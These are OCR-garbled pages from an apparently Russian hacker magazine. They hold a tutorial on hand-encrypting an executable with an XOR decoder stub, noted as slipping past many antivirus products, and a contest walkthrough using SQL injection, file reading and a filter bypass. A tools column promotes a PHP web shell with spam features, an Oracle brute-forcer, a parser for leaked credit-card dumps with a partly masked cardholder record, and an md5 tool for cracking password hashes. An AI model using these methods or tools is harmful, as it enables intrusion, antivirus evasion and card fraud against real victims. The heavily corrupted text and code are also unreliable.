почему ЬІ N К выдаетошибку 1 104 :)). Компиляцияуспешнозавершена, 
теперь откроем файл ех.ехе под отладчиком. Что ж, листинг, выведенный 
ОНуОЬд, дает полное представление о работе программы: 

00401000 РІІ5Н 0 

00401002 РІІЗН ех. 00403000 ;ТіДІе = " Зішріу ргодгаш" 
00401007 РІІЗН ех. 0040300Р ;ТехС = "Неііо, Могісі! " 

004 010 ОС РІІЗН 0; | ЪОшіег = ШЬЬ 
0040100Е САЬЬ <іІМР . &изег32 .МеззадеВохА> 

00401013 РІІЗН 0 ; ЕхіССосІе = 0 

00401015 САЬЬ <^Р . &кегпе132 . ЕхіСРгосезз> 

0040101А амр ШОКЕ РТР БЗ: [<&кегпе132 . Ехіі:Ргосезз> 
00401020 аМР ШОКЕ РТР БЗ: [<&изег32 .МеззадеВохА>] 

Естественно, никакой антиотладки нет, файл ничем не пакован, и следо- 
вательно, он без труда обрабатывается отладчиком. Отметим точку входа 
в нашей программе (Епігу Роіпі, или ЕР): 00401 000Ь. Откроем программу 
в Ьех- редакто ре, мой любимый — ѴѴіпНех. Точку входа в ѴѴіпНех найти 
легко: нужно лишь произвести поискбайтов первых инструкций (ком- 
бинация клавиш <СігІ-АП;-Р>), которые нам любезно подскажет ОНуОЬд. 

В нашем случае это «6А006800...». Этого вполне достаточно, и ѴѴіпНех 
показывает нам нужные байты, где пресловутая точка и расположена. 
Они начинаются по адресу 400Ь. Что мы сделаем? Мы вручную закодиру- 
ем инструкции, напишем кодировщик и вставим его двоичный код в файл 
Для простоты зашифруем инструкции операцией ХОР 35. Тогда кодиров- 
щик будет выглядеть следующим образом: 

00401000 :дтр 00401028 ;Нех-коды перехода — ЕВ26Ъ. 

00401002 : /Закодированные инструкции. . . 

00401028: шоѵ есх , 27 

0040102Б гризіі едх 

0040102Е гризЬ. есх 

0040102Е :шоѵ есіх, [есх+00401000 ] 

00401035:хог есЬс,35 

00401038: шоѵ [есх+00401000], есіх 

0040103Е:рор есх 

0040103Е :рор есіх 

00401040 : Іоор 0040102Б 

00401042 :д шр 00401002 



Знаю, что ты сейчас скажешь: «Это неправильно! Кодировщикзатирает 
байт перехода!». На это я отвечу: «Да, но мы уже использовали этот байт, и 
он нам больше не понадобится, так какпереход на внедренные инструк- 
ции нужен лишь однажды — сразу после старта программы» :). 
Рассмотрим код более подробно. Первая инструкция по адресу 00401 028 
— установка счетчика цикла декодировки (ЕСХ — для команды Іоор), сле- 
дующие две команды — сохранение регистров ЕСХ и ЕЭХ в стек, для того 
чтобы впоследствии их восстановить и не оставить следов после работы 
декодировщика, тоѵесіх, [есх+00401000] помещаете регистр ЕйХ закоди- 
рованные команды, смещенные относительноточки входа программы на 
значение ЕСХ. Причем еслиучесть, что команда Іоор не увеличивает, а 
уменьшаетсчетчик ЕСХ, становится понятно, что декодирование проис- 
ходило принципу «отхвоста к голове», то есть от конца закодированных 
данных программы по направлению к их началу. Следующая команда 
хогес!х,35 в комментариях не нуждается — это декодировка значения, 
помещенного в есіх. Разумеется, если ты решил выбрать более сложный 
способ кодировки, на месте этой инструкции должен находиться соответс- 
твующий набор команд. Далее декодированный код помещается на свое 
место в памяти. Следующие две инструкции восстанавливают регистры из 
стека (рор есх, рор есіх), далее находится команда счетчика [оор 00401 020. 
В самом конце располагается безусловный переход на адрес памяти, на- 
чиная с которого будут находиться уже раскодированные после выполне- 
ния цикла декодировщика инструкции. Здесь, какты, наверное, заметил, 
без трудностей не обойтись, так как в начало секции кода нужно вставить 
переход на декодировщик, то есть необходимо двигать весь код, а это 
приведет к необходимости впоследствии высчитывать и новое положение 
таблицы импорта. Но волков бояться — в лес не ходить. А вот и код нашего 
декодировщика в шестнадцатеричном виде: 

{В927 0000 0052 518В91001040 00 83Е235899100104000595АЕ 

2ЕВЕВВЕ} 

Сейчас я расскажу, как его получить. 

План действий 

Итак, вотте действия, которые необходимо проделать для кодирования 
инструкций защищаемой программы и записи дешифратора в файл: 

1. Открыть файл под отладчиком и определить, где располагается точка 
входа. У нас этот адрес равен 00401 000Ь, но, по правде говоря, точкой вхо- 
да это можно назвать с натяжкой. Данный адрес — это Ітаде Вазе + Епігу 
РоіпЕ Но мы все равно будем говорить «точка входа» для простоты. 

2. Записать машинные коды первых 2-3 инструкций, которые мы видим в 
отладчике, и не забыть посмотреть, какую дли ну за ни мают все исполняе- 
мые инструкции, вместе взятые (после их окончания обычно расположен 
массив нулей, созданный компилятором для выравнивания, такчто мы не 
испортим файл, вставив свой кодировщик]. 
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>На нашем ОѴОты 
найдешь ѴѴіпНех и 
ОІІуйВб, использо- 
ванные в этой статье, 
а также все исходники 
и компилированные 
файлы-примеры 
(исходный и 
упакованный). 




>Эта статья, конечно, 
не претендует на пол- 
ноту изложения темы. 
Для того чтобы лучше 
«въехать» в создание, 
правку и защиту 
двоичного кода, про- 
чти «Дизассемблиро- 
вание вуме» и «Образ 
мышления ЮА» Криса. 
Кроме всего прочего, 
не помешаетналечь 
и на низкоуровневое 
программирование, 
воспользовавшись 
учебниками, коих 
в Сети великое 
множество. 




> Готовый ех.ехе под отладчиком 



3. Открыть файл любым шестнадцатеричным редактором и 
найти среди двоичных кодов первые инструкции программы, 
которые мы записали. Далее нужно вырезать эти инструкции 
(их длину мы определили в предыдущем пункте) и вставить 
их на 2 байта ниже того места, откуда мы их взяли. В нашем 
примере смещение относительно начала в ѴѴіпНехбыло 
равно 4006 (адресация иная, нежели в ОІАуОВѲ, так как 
ѴѴіпНех отображает М2- и РЕ-заголовки, которые скрывают- 
ся многими отладчиками), значит, мы вставим инструкции, 
начиная с адреса 4026. Перемещение это необходимо для 
того, чтобы записать в начало файла инструкцию перехода на 
декодировщик. Она занимает2 байта (ЕВ26Ы и выглядиттак: 
)гпр 004010286 (адрес этот не случаен, он является окончани- 
ем исполняемых инструкций нашей программы). Введем по 
смещению 4006 наш переход. 

4 . Над инструкциями, начиная с адреса 4026, нужно 
проделать преобразование. Мы выбрали простейший 
классический способ — побитовое логическое сложение 
ХОР по модулю 356. Выделяем 266 байт. Предупреждая твой 
вопрос, скажу: да, и последний нулевой байт этой после- 
довательности тоже нужно выделять, так какой является 
частью исполняемой инструкции. Если его оста вить та к, то 
впоследствии (при декодировании) он превратится в 356, 
программа перейдет по неверному адресу и все накроется 
тазом. Преобразование в ѴѴіпНех производится выбором 
пункта меню «Правка-^ Модифицировать». Итак, теперь все 
инструкции закодированы. 

5 . Коды инструкций декодировщика нужно ввести сразу 
после окончания шифрованных инструкций кода программы, 
то есть начиная с адреса 4286. 

Какже узнать их шестнадцатеричные значения (их я привел 
выше)? Предлагаю самый простой путы ввести инструкции 
прямо в отладчике ОНуйбд, затем скопировать бех-значе- 
ния, выделив набранные команды и выбрав из контекстного 
меню правой кнопки мыши «Віпагу-> Віпагу сору». Но тогда 
вводи инструкции строго с адреса 004010286, иначе адреса 
перехода для инструкций ітр или Іоор могут быть неверно 
интерпретированы, ведь в отладчике они считаются по 
смещению относительно те куще го адреса. Я категорически 
противтого, чтобы копировать модифицированные байты 
в двоичный файл прямо из-под отладчика, хотя он на это и 
способен. Можно случайно совершить неверное действие, 
а шестнадцатеричный редактор — это профессиональный 
и удобный инструмент, специально предназначенный для 
таких операций. Итак, копируй и вставляй инструкции 




> Выделенный фрагмент— распаковщик 



кодировщика. Кстати, когда нажмешь <СМ-Ѵ> для вставки, 
выбирай в появившемся меню пункт А5СІІ-НЕХ, таккакдан- 
ные в буфере обмена являются НЕХ-дампом. На этом этапе 
нужно сохранить файл под новым именем, например ехі .ехе. 

6. Почти готово! Осталась одна проблема — таблица 
импорта. Она сместилась на энное количество байт, 
так как мы вставляли посторонние данные в секцию 
кода. Можешь попробовать запустить программу, но 
гарантирую, что она не заработает должным образом 
без перемещения таблицы, так как вызов библиотеч- 
ных функций не состоится. Для того чтобы все пришло в 
норму, высчитаем новое положение таблицы импорта для 
модифицированного файла. Утилитами мы пользоваться 
не будем, а сделаем все вручную. Откроем в ѴѴіпНех оба 
файла: измененный и оригинальный. Теперь попробуем 
найти таблицу. Для этого нажмем <СМ-Р> и введем имя 
функции, которая встречается почти во всех ѴѴіп32-про- 
граммах: ЕхбРгосевз. Проделаем то же и для второго 
файла. Теперь сравним: в оригинальном файле смеще- 
ние строки равно 65Е6, а в модифицированном — 6966. 
Значит, нам нужно удалить из модифицированного файла 
нулевые байты в количестве, равном разности этих зна- 
чений: (696б-65Еб)=53б. Причем удалить не где угодно, а 
перед таблицей импорта. Перемести ползунок прокрутки 
чуть вверх, и ты увидишь непаханое поле нулей. Удали 
386 нулевых байт. Кстати, ѴѴіпНех отображает в строке 
состояния размер выделенного блока, что очень удобно. 
Все готово! Запускай модифицированный файл. Разрази 
меня гром, это работает! 

Счастливого плавания :) 

Признаюсь честно, я был оченьудивлен, когда узнал, что 
добрая половина антивирусов никак не реагирует на подоб- 
ное «народное творчество». Хочется воскликнуть: «Если уж 
анализ инструкций никуда не годится, проверяйте хотя бы 
СРС!» Но даже и это, увы, зачастую не делается. Конечно, 
СРС всеже лучше подправить. 

Чем хорош этот метод? Он наглядно показывает принцип 
работы протекторов/пакеров (а также некоторых вирусов). 
Крометого, на его основе можно разрабатывать более слож- 
ные защитные механизмы. Более же всего ценентотопыт, 
который ты приобрел, ведь, немного попрактиковавшись, 
ты сможешь кодировать файлы, не используя ничего, кроме 
стандартного отладчика беЬид.ехе и собственного могучего 
интеллекта. "?-! - 
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Ты наверняка слышал про вечеринку ЮОхРаПу от любимого 
журнала по случаю выпуска сотого номера, а может быть, и 
видел это зрелище собственными глазами :). Жаль только, что 
мы думали, что народу будет куда больше и атаковать сервер 
возьмется приличное количество человек со своими ноутами, 
а в итоге оказалось, что собственными тачками владеет всего 
нескольких взломщиков : (. В связи с этим было решено провес 
ти теперь уже веб-часть оффлайн-конкурса взлома, в которой 
себя смогли бы проявить как те, кто по каким-либо причинам 
не был на вечеринке, так и присутствовавшие там, поскольку 
в соревновании никто далеко не продвинулся :) . Кроме іеп'а, 
который взялся за крякмис. В итоге, в веб-части больше всех 
очков набрал Ьех_Ѵоос1оо. 

Ні 



ВЗЛОМ 









ѵ-конкурс 



Итак, для начала о небольшом нововведении. Теперь при регистрации в основном скрипте статистики у каж- 
дого пользователя будет вестись статистика прохождения конкурса — это позволит четче отслеживать число 
участников и победителей. При удачном раскладе подключу и помесячную статистику, а возможно, и доступ к 
предыдущим конкурсам ;). 

Атеперь о прохождении конкурса :). В самом начале находим ЫіпсІ зц 1-іп]ес1:іоп в скрипте новостей сайта. Но 
обычный ипіоп зеіесі здесь почему-то не проходит, и как наши взломщики ни старались, ничего дельного из 
этого не вышло. Поэтому рассказываю, что нужно было делать дальше. Осмотрев территорию в поиске новых 
уязвимостей, натыкаемся на бажный скрипт зоЙ/зоЙ. рпр, позволяющий читать локальные файлы из вой и 
текущей папки. Сразуже считываем іпсіех.рітр, где в комментариях видим ссылку на іпбіаі 1 . р Ь р, из которо- 
го можно взять имена основных полей некоторой таблицы Іодезу. Но этого пока мало — нам нужен способ 

чего не остается, кроме как смотреть на сам код іпбех.рпі; 



.рпр и на способ 



выполнения тувді-запросов. Й тутниче , , 

фильтрации переменной пе\л/з_іа. Как ниудивительно, она обходится в два счета, так как проверка идет 
тупым парсингом риегу_з1хіпд на подстроку «веіесі»: в переменной $_Ь ЕРѴЕР['дие гу_в1; гі п д ' ] , передаваемой 
веб-сервером к рПр-интерпретатору, содержится именно та строка, которую отправляет клиент, поэтому, 
вписав «%73е1есй>, мы можем провести стандартную атаку ипіоп-зеіесй А ведь отсюда достаточно сделать, 
например, «ипіоп зеіесі: де^циегу.йіе ѵѵПеге тііе Ііке ' а сі гл і п * ' » и получить заветный адрес админки, для досту- 
па к которой просят пройти авторизацию. Читаем исходникадминки, в ней видим, что проверка пароля идет 
посредством сверки последних восемь октет, что не позволяеттак просто использовать тсібіпвісіе или ана- 
логичные программы. Но что мешает написать простой скрипт перебора самим? Я не зря залил в раздел вой 
реально работающий рПр-интепретатор ;). Проведя тестовый перебор по числам, находим строкус нужным 
хэшем. Теперь предлагают ввести ключ, на этом этапе нужно внимательно изучить сам алгоритм работы про- 
верки. Если коротко, то он выглядиттак: человек вводит ключ; если его хог-сумма равна некоторой константе, 
то некоторая постоянная строка шифруется по хог-алгоритму с введенной и результат выполняется в функции 
еѵаі. Если подставить любую строку с хог-сум мой, равной заданной константе, скрипт выведет последова- 
тельность байт по формуле ізПосІпік л кеу_(гие л кеу_изег, где івПосІпік — исходный байт, кеу_ігие — искомый 
ключ, кеу_изег— введенный пользователем ключ. Поэтому, полагаясь на то, что большинство скриптов на- 
чинается на «<?рЬр», ксорим результат скрипта с введенным ключом и «<?рпр». Если длина ключа меньшей 
пяти, тогда в первых пяти байтах результата будет искомый ключ. Он будет содержать незамысловатую строку 
— «Ь4ск», введя которую, мы получим листинг директории с файлом Із_[еѵе1.ш. В нем и находится секретное 
сообщениедля прохождения уровня и начисления баллов :]. 

Респект победителям и гостям нашей прошедшей вечеринки! Оставайтесь снамивонлайнеи оффлайне :). 
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ПРОГРАММЫ ДЛЯ ХАКЕРОВ 



Л ПРОГРАММА: С'ХЬНЕИ 
ОС: *ГЧІХЛЛН 
АВТОР: О О ТУН С 




>Удобный и функциональный веб-шелл 



В прошлых выпусках Х-Тооіз я неоднократ- 
но выкладывал различные веб-шеллы (в 
том числе и приватные :)). Что и говорить, 
удобный, быстрый и функциональный 
веб- шелл порой здорово помогает при 
очередном взломе. Но, как известно, на 
вкус и цвет товарищей нет. Одним сло- 
вом, продолжаю традицию и представляю 
твоему вниманию еще один рЬр-шелл под 
названием 0x5 Ь е II. 

Из фишек этого веб-шелла можно отметить 
предельно простую и удобную работу с файлом 
(ударение на последний слог=)) на атакуемом 
сервере: 

• вся информация о файлах, права 
(включая збіску Ъіб) ; 

• облегченный режим для быстрого сер- 
финга ; 

• удобная мышечная навигация; показы- 
вает как относительный, так и абсо- 
лютный путь; 

• создание папки /файла ; 

• заливка файлов: РОЕМ, РТР, НТТР (в 
случае неудачи файл создается в 
/Стр). 

Также в ОхБЬеІІ успешно реализован 
местный 50І_-клиент, особенностью 
которого является поиск по всем 
табличкам: 



• всегда на виду список всех таблиц; 

• скачивание результатов запросов в 
файле * . сзѵ. 

Крометого, шелл имеетв своем арсенале 
несколько специальных функций, которые уве- 
личиваютего боевой потенциал :). Расписывать 
все подробно я не буду — познакомишься сам. 
Коротко отмечу лишь основные пункты меню: 

[РНР] — еѵаі -консоль + ссылки на часто 
используемые скрипты 
[С00К1Е] — редактирование соокіе, со- 
здание своих 

[СМ&] — системные команды + список 
готовых команд 

[МАИ] — мыльные функции : режим флуда + 
режим спама 

[РОРТЗСАМ] — портсканер; настраи- 
ваются все параметры; есть автоскан 
основных портов , названия известных 
демонов 

[50СК] — ручная работа с сокетами 
( ізоскореп ( ) ). Режим вывода НТМЬ и 
РЬАІЫТЕХТ 

[РРОХѴ] — НТТР-прокси из браузера. 
Подделка заголовков : ІІзег-АдепІ: , 
Кеііегег; поддержка режимов Р08Т и 
СООКІЕ 

Залив файлов реализован двумя методами: 
залив по НТТР-протоколу и залив/слив по РТР. В 
общем, достаточно удобный и функциональный 
сценарий, способный облегчить твою повсед- 
невную рутину =). Юзать его или нет— решай 
сам, но бережно хранить на своем винте/флеш- 
ке ОхЗЬеІІ просто необходимо :). 

Л ПРОГРАММА: ЗОР АСІЕ 
ОС: ѴІН&0Ѵ5 2000/ХР 
АВТОР: С1.АМ0КР 

Рассказывая об очередном взломе базы 
данных, раскрутке инъекта или получении хэша 
рутового пасса от Му50І_, зачастую начинаешь 




>Тулза для взлома БД Огасіе 

задумываться надтем, сколько времени и сил 
уходит на работу подобного рода. Про автомати- 
зацию говорилосьуже не раз. Но, как известно, 
раз на раз не приходится =). Одно время я 
всерьез подумывал о написании полнофунк- 
ционального Му50І_- брутера, который бы не 
только умел работать с брутом табличек и полей, 
но и подбирал аккаунты к базе. Увы, но времени 
на реализацию задуманного я так и не нашел 
(привет преподам из моего универа). Зато не 
такдавно в мои руки попала интересная тулза 
— ЗОгасІе. Как оказалось, утила предназначена 
для взлома БД Огасіе =). Кстати, ко мне на мыло 
регулярно сваливаются письма с просьбой 
помочьдостать/найти подобного рода софт. 
Поэтому читай внимательно, чтобы компетентно 
оценить сущность тулзы. Начнем, пожалуй, с 
краткого описания имеющихся вкладок меню: 

1 . Іпіо 

2 . Наск 

3. Вгибеііогсе 

4 . Раззиогбз 

5 . Соттапбз 

6 . Зсаппег 

7 . Зсап Збабиз 

8 . АЬоиб 

Во вкладке іпіюты можешь просмотреть полу- 
ченную инфу о базе на конкретном хосте (требу- 
ется указать лишь Ьозі/ір и, если необходимо, 
изменить дефолтовое значение порта). 

На вкладке Зсаппегтебе предлагается 
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запустить масс-скан по диапазону ІР-адресов 
на обнаружение установленного Оракла. Там 
же, в соседней менюхе, располагается некое 
подобие лога — 5сап ЗіаіііБ. Вкладки Наск и 
Вгиіеіогсе похожи и выполняют сходные фун- 
кции. Здесь находятся параметры для запуска 
брута аккаунтов к базе. Основных вариантов 
всего два: брутпо дефолтовым аккам и брутпо 
файликам ивег/равзѵѵогсі. Кстати, пара слов о 
списке дефолтовых акков ака сІе^аиИ; ассоипів 
іібТ Он располагается в дире стулзой и ты 
можешь смело редактировать его, хотя юзать 
собственные листы изег/раББѵѵогсІ гораздо 
удобнее. В разделе СоттапсІБ указывается 
хост/порт, аккаунт к базе и команда на выпол- 
нение :). О вкладке АЬоиІ рассказывать не буду, 
сам изучишь =). Скажулишь, что автор столько 
полезной утилы — дІатОгТ Пожелаем ему удачи 
и плодотворной работы. Одним словом, сливай 
тулзус нашего диска не задумываясь. Мив{ Ьаѵе :). 

Л ПРОГРАММА: СС2ВАМК ЫЗТСЕМЕРАТОР: 
ОС: ѴІМ00ѴЗ 95/98/99/МЕ/НТ/2000/ХР 
АВТОР: КА2Е ЗОЕТѴАРЕ 




> Парсим свежую базу картона :) 

Помнится, еще в осенних номерахжурнала я 
выкладывал несколько софтинок для работы с 
картоном ака кредитками. Но основные функ- 
ции тогда ш них утил сводились к поиску банка 
(по бину], определению штата/города и типа 
карточки (классик, голд, платинум и пр.). Все 
это, несомненно, нужно, и порой без такого соф- 
та не обойтись. Но что делать, если необходимо 
отпарсить свежеслитую базу картона столько 
что поломанной базы амерского шопа? =) Ко- 
нечно, можно написатьсобственный парсер, ко- 
торый будет раскладывать кредитки в заданном 
порядке, сортировать бины и т.д. Однако есть 
гораздо более продуктивный способ — заюзать 
тулзу СС2Вапк ЫзЮепегаІюг от Ра2е ЗоИѵѵаге. 
Утила ищет в текстовом файле номера кредит- 
ных каточек и, подбирая к номеру информацию 
о банке, выводит данные в виде списка. Она 
определяет название банка, страну, телефон и 
тип картонки. 

Полученную инфу можно сортировать по своему 
усмотрению и сохранять в отдельный файл. 
Причем никто не мешаетзагружатьбазы с кар- 
тоном вида: номер креды/ФИО кардхолдера/ад- 
рес/телефон/мыло. Тулза корректно выделяет сс 



питЬегака номер карточки, определяетпо нему 
данные банка, а вся остальная инфа записыва- 
ется в поле СС ІпЬ :). 

Для корректной работы программы нужно, что- 
бы вся информация об одной кредитной карто- 
чке помещалась в одну строчку с разделителем 
«Пробел» или «;». 

Для примера возьмем картоночку какого-нибудь 
амера: 

44304100******** сіопаісі с го***** 

0307 926 36** кеггу апп мау 4**** Ш 
зеббегзопѵіііе ТГЗА 8123****** 

Даже такого вида записьутила отлично рас- 
познала, выдав мне всю имеющуюся инфу по 
кредитке :). В принципе, если втвоей базе вмес- 
то пробела или точки с запятой используется 
другой разделитель, то отпарсить ее средства- 
ми РНР не составит никакого труда, заменив 
нужный разделитель и скормив базу СС2Вапк 
І_І5і0епега1:ог=). 

Последовательность полей не имеет никакого 
значения. Прога успешно работаете карточками 
Ѵіза, МазІегСагсІ и АтЕх. База бинов со време- 
нем устаревает, но и эту проблему можно решить 
путем дополнения файлика БДутилы — Ьіпв =). 

ПРОГРАММА: 5МС - 5ТКІІЧС ТО МС'5 СОИѴЕР.ТОР 
ОС: ѴІМ0ОУЗ 2000/ХР 
АВТОР: ѴѴУ.СРЗ-ТЕАМ.ЕИ 

Времена, когда можно было слить рутовый 
ОЕЗ-хэш из /еіс/развѵѵсі, давно прошли. 
Сейчас, как правило, приходится иметь дело 
с тбб-хэшами паролей, хранящимися в/еіе/ 
збасіоѵѵ. Соответственно, возникает потреб- 
ность брута тсіб-хэшей. В Сети существует 
приличное количество сервисов, предна- 
значенных для этих целей, но, увы, далеко не 
всегда они могут оказать содействие :). В таких 
ситуациях приходится юзать брут самосто- 
ятельно. Вот здесь тебе и пригодится тулза 
с красивым названием 5МС, что расшиф- 
ровывается как 5ігі пд іо гл б 5 сопѵегіюг =). 
Программа предназначена для шифрования 
строк тб5-алгоритмом. Использовать ее 
необходимо для конвертации файла паро- 
лей в тсіб-формат. Таким образом можно 
достигнуть наибольшей скорости брута 
тсіб-хэшей. При старте тулзы загружается 
файл паролей, содержащий строки; прога 
считывает файл построчно, шифрует строку 
тсІ5-алгоритмом и записывает результат в 
файл гезиІТ.М. Запускается утила следую- 
щим образом: Бгпс.ехе разБ.Ш. На выходе 
получаем файл гезиІІ.М, содержащий 
зашифрованные пароли. 



Скорость утилы впечатляет — двухмегабай- 
тный файл тулза шифрует около 9 секунд :]. 
Огорчаетлишьто, что программа не имеет 
ѲІЛ-интерфейса и запускается только из 
командной строки. 

Однако минимализм имеетсвои преимущества: 
при запуске утила не будет видна в 
панели задач. Кактолько прога закончит 
работу, она тебя об этом известит :). 

В общем, полезная в хозяйстве софтинка — 
заливай на винт не раздумывая =). 

ПРОГРАММА: 0К ЗСЕЕЕИЕАМЕЕ 
ОС: ѴІИООѴЗ 2000/ХР 
АВТОР: 0КНАѴЗОРТ 




>Обломи мониторщиков =) 



Что главное в нашем нелегком деле? =] Пра- 
вильно, анонимность и безопасность. А какая 
может быть анонимность, когда у тебя за спиной 
постоянно мониторит работу твой брат, твоя 
девушка, коллеги или, что еще хуже, друзья. 
Лично я получаю мало удовольствия, когда я 
сижу на лекции с ноутом, а особо любопытные 
личности так и норовят повернуть свою голову 
ака хлебало в сторону моего монитора (о лекто- 
ре я вообще молчу =)]. На такой случай хорошо 
иметь под рукой прогу, которая сворачивала 
бы все окна или вовсе вырубала бы экран 
монитора. Именно подобного рода тулзу я и 
выложил в этом выпуске :). Называется она йК 
ЗсгеепНапег. 

Программа позволяет запускать хранитель 
экрана или выключать монитор при разме- 
щении курсора мыши в определенном углу 
рабочего стола. Надо признать, тулза сразу 
пришлась мне по душе, поскольку ты сам 
можешь назначить область рабочего стола, 
при наведении курсора на которую моник 
будет гаснуть :).Если ты переместишь курсор 
в левый верхний угол, начнет работать 
хранитель экрана, а в правый верхний угол 
— выключится монитор. 

Углы можно менять. Для каждого действия 
разрешено заюзатьлюбой из четырехуглов 
рабочего стола, что даеттебе дополнительную 
свободу действий :). Так что если тебя в конец 
замучили мониторщики — ставьутилу немед- 
ленно =). ИИ 
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> Народ начал подтягиваться 




> Играть в Расктап на огромном проекторе - это рулеззз! 




> Беспонечно рекурсивный фрикерский комп, внутри которого 
ещетритакихже компа 




> Разгонный стенд испаряет десятый литр азота 
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Вечеринка ІООхРагіу 

Отчет о вечеринке, посвященной сотому номеру 

Вечером 12 мая на север столицы начали стягиваться все самые крутые 
хакеры Москвы. Пугая бабушек в метро своими сочными рассказами о 
порученных серваках и захаканных крякмисах, порядка 300 наших верных 
читателей, парней и девушек, добралось до скейтпарка «Адреналин», где и 
состоялась вечеринка, посвященная выходу сотого номера журнала т^ нер. 



Банкомат, лаве, веревка 

Идея снять фильм для вечеринки появилась давно, я долго об этом меч- 
тал. Смотрел все эти фильмы «Хакеры» и т.д. — и плакал, хотел сделать 
что-то свое. Удачно получилось: Федя Добрянский познакомил меня с 
девушкой Светой, которая отличный оператор, и как только появилась 
возможность, я принял решение снимать Х-фильм. 

Скажу честно, я никогда не думал, что это так геморройно :]. Нашу не то 
чтобы очень длинную картину мы снимали целых два дня в два этапа. И 
после каждого съемочного дня каждый из его участников чувствовал 
себя так, словно по нему проехал трактор «Беларусь». Представлю со- 
став съемочной группы. 

Сценарий: пікііогг. 

Актеры: пікііогг, Илья Пожарский (наш РК-менеджер), 2аСо (хекер, ко- 
торый год назад сломал наш сайт и теперь работает с нами), Дмитрий 
Травин (гопник из МАИ, который делает нам новости) и Макс Глеков 
(мой старый приятель). 

Оператор, монтажер, звукорежиссер: Света Стрельникова. 

Я специально ничего не буду говорить о сценарии фильма, чтобы не пор- 
тить впечатление тем, кто будет смотреть его первый раз. Фильм лежит 
на нашем 0Ѵ0. Скажулишь, что там нетположительных и отрицательных 
героев, это просто фильм про пятерых парней, которые решили поднять 
лаве так, как умеют. Никакой глубокой идеи там не ищи, это все щзі: іог 
{ип. 

Назад к вечеринке 

Возвращаясь к вечеринке, хочу сразу оговориться: это был первый 
опыт проведения подобных мероприятий за всю историю сущест- 
вования журнала, поэтому очень многое мы делали впервые. При- 
готовления начались задолго до вечеринки: мы проанонсировали 
событие, сделали сайт рагіѵ.хакер.ги для регистрации участников, 
договорились со скейтпарком, с нашими партнерами и осуществи- 
ли глобальный брейнсторм, чтобы придумать контент для вечерин- 
ки. Но все это было цветочками по сравнению с реализацией всего 
задуманного :]. 



Азот и высокие частоты 

Гвоздем программы вечеринки я решил сделать оверклокерское шоу: 
экстремальный разгон компьютера с использованием азотного охлаж- 
дения. Ну знаешь: пар, мировые рекорды. Я обратился к коллегам в 
журнал «Железо», и Донор, вспомнивший свои Х-корни, вызвался все 
организовать. В кратчайшиесрокибыл найден отличный пареньсвысо- 
кочастотным датчиком в заду — Саркис ака ОеОаІ. Этот человек пришел 
к нам в редакцию по за паху оттолько что привезенного железа из Азиз’а: 
платы Азиз Соттапсіо, видюхи ЕЫ88006ТХ и физического ускорителя 
РЫзХ. По его взгляду мы с Донором сразу поняли: немногое для него 
может сравниться с радостью от крутых железяк и низких температур. 
То, что нам надо. Ктомуже Сакисоказался классным, веселым парнем. В 
итоге, после длительных подготовок, поездокза азотом, железом и ноч- 
ныхтестов, на вечеринке предстал красивый разгонный стенд, который 
показал неплохие результаты. Подробный отчетоб этом ищи в Реггит’е. 
А мы идем дальше. 

Фрикеры, конкурсы и все остальное 

Серега Долин сделал фрикерский стенд. Они с Деном намутили старого 
железа и спаяли настоящего монстра — компьютер стремя материнками 
в одном корпусе. Установили на него кучу старых игрушек Юике Ыикегп, 
Расктап и т.д.), подключили к проектору и все желающие на их стенде 
могли погамать в старые игрушки. Еще Серега притащил все девайсы, 
которые паял для журнала, и показывал их, отвечая на многочисленные 
вопросы. 

Что касается конкурсов, то на сцене я провел несколько соревнований, в 
ходе которых участникам пришлось обжимать на время витую пару, сочи- 
нять стишки про хакеров, вспоминать весь хакерский сленг и хакерские 
навыки. Отдельного упоминания заслуживают интерактивные конкурсы, 
которые сделали Сквозной с 2аСо. Хоть и пришло мало народу с ноутбука- 
ми, те, кто захотел поломать и покрякать, поломали и покрякали. Взломали 
все наши ѵѵеЬ-конкурсы, поднятые на ѴѴі-Рі точках Азиз и даже разгадали 
сгаскте. 

Можно было бы рассказать еще очень много интересного, но пусть лучше 
это сделаютза меня фотографии. 

До новых встреч, друзья. ЛС 
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> - Этой штуковиной, парни, можно даже бетон крушить! 




> - Сейчас нажму на кнопку, и валим отсюда! 




>СВЧ-хекеры разя ива ют азот для дегустации 



>Фрикеры, как всегда, устроили беспорядок 




>СпасибоА51І5за крутую видяху! 



> Парни оторвали по призу 
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Огромное спасибо всем нашим партнерам, без которых эта вечеринка 
не состоялась бы. 



Коек 5оІісІ - Неагі ТоисМпд 

А51І5 — любимый партнер 100хРаг*у 

Благодарим замечательную компанию Азизза отличное железо для разгон- 
ного стенда, ѴѴі-Рі точки для наших конкурсов и замечательные призы. 
Материнская плата Азиз Соттапсіо позволила нашим оверклокерам до- 
биться высоких результатов в экстремальном разгоне. Несчастный Сеіегоп 
разогнали так, что попали в тройку рекордов мира. А крутейшая видюха Азиз 
ЕЫ88006ТХ показала отличные результаты в ЗБ Магк'е. 




СОК8АІК 



СОК5АІК — высокочастотный партнер ЮОхРагіу 

Разгон не получился бы, если бы не компания Согзаіг, выпускающая лучшую 
разгонную память в мире. Пара модулей памяти Согзаіг Ботіпайэг в раз- 
гонном стенде обеспечила потрясающий результат и стабильную работу в 
сверхэкстремальном режиме. Спасибо! Спасиботакжеза призы, предостав- 
ленныеучастникам вечеринки! 



ИА 4 ТЕСН 



А4ТесН — ЬагсЬ/ѵаге-партнер 
ІООхРагІу 

Огромное спасиботорговой марке 
А4Тесб за чудесные лазерные мыши, 
ІР-клавиатуры стелефоном на борту и 
ѵѵеЬ-камеры, подогнанные нам в ка- 
честве призов для читателей. Думаю, 
они никого не оставили равнодушны- 
ми. Что касается ѵѵеЬ-камер, то одну из 
них — А4ТесЬ РК-336 — мы вообще ис- 
пользовали в экстремальном режиме: 
транслировали с ее помощью процесс 
экстрим-разгона через проектор, 
чтобы все могли его наблюдать. Могу 
сказать, что ѵѵеЬ-камера отлично спра- 
вилась! Что уж говорить об использо- 
вании ее для интернет-общения :). 




КГСАІЛ-ЕГС 




ѴѴевіегп 

ОідіІаГ 



Кгаиіег — бесперебойный партнер ІООхРагІу 

Спасибо компании Кгаиіегза предоставленные призы: мыши и ИБП. 
Уверен, получившие их читатели остались довольны продукцией 
Кгаиіег и их больше не пугают отключения электропитания :). 



ѴѴЕ5ТЕѴМЧ ОІСІТАІ_ — надежный НЮР-партнер ЮОхРагіу 

Надежный жесткий диск — очень важный элемент разгонного стенда. 
Установленный на нашем стенде ѴѴБ ВАРТОВ отработал на 5+! А благодаря 
стильному прозрачномуокошку все могли наблюдатьза перемещениями 
головки диска. 

асте 

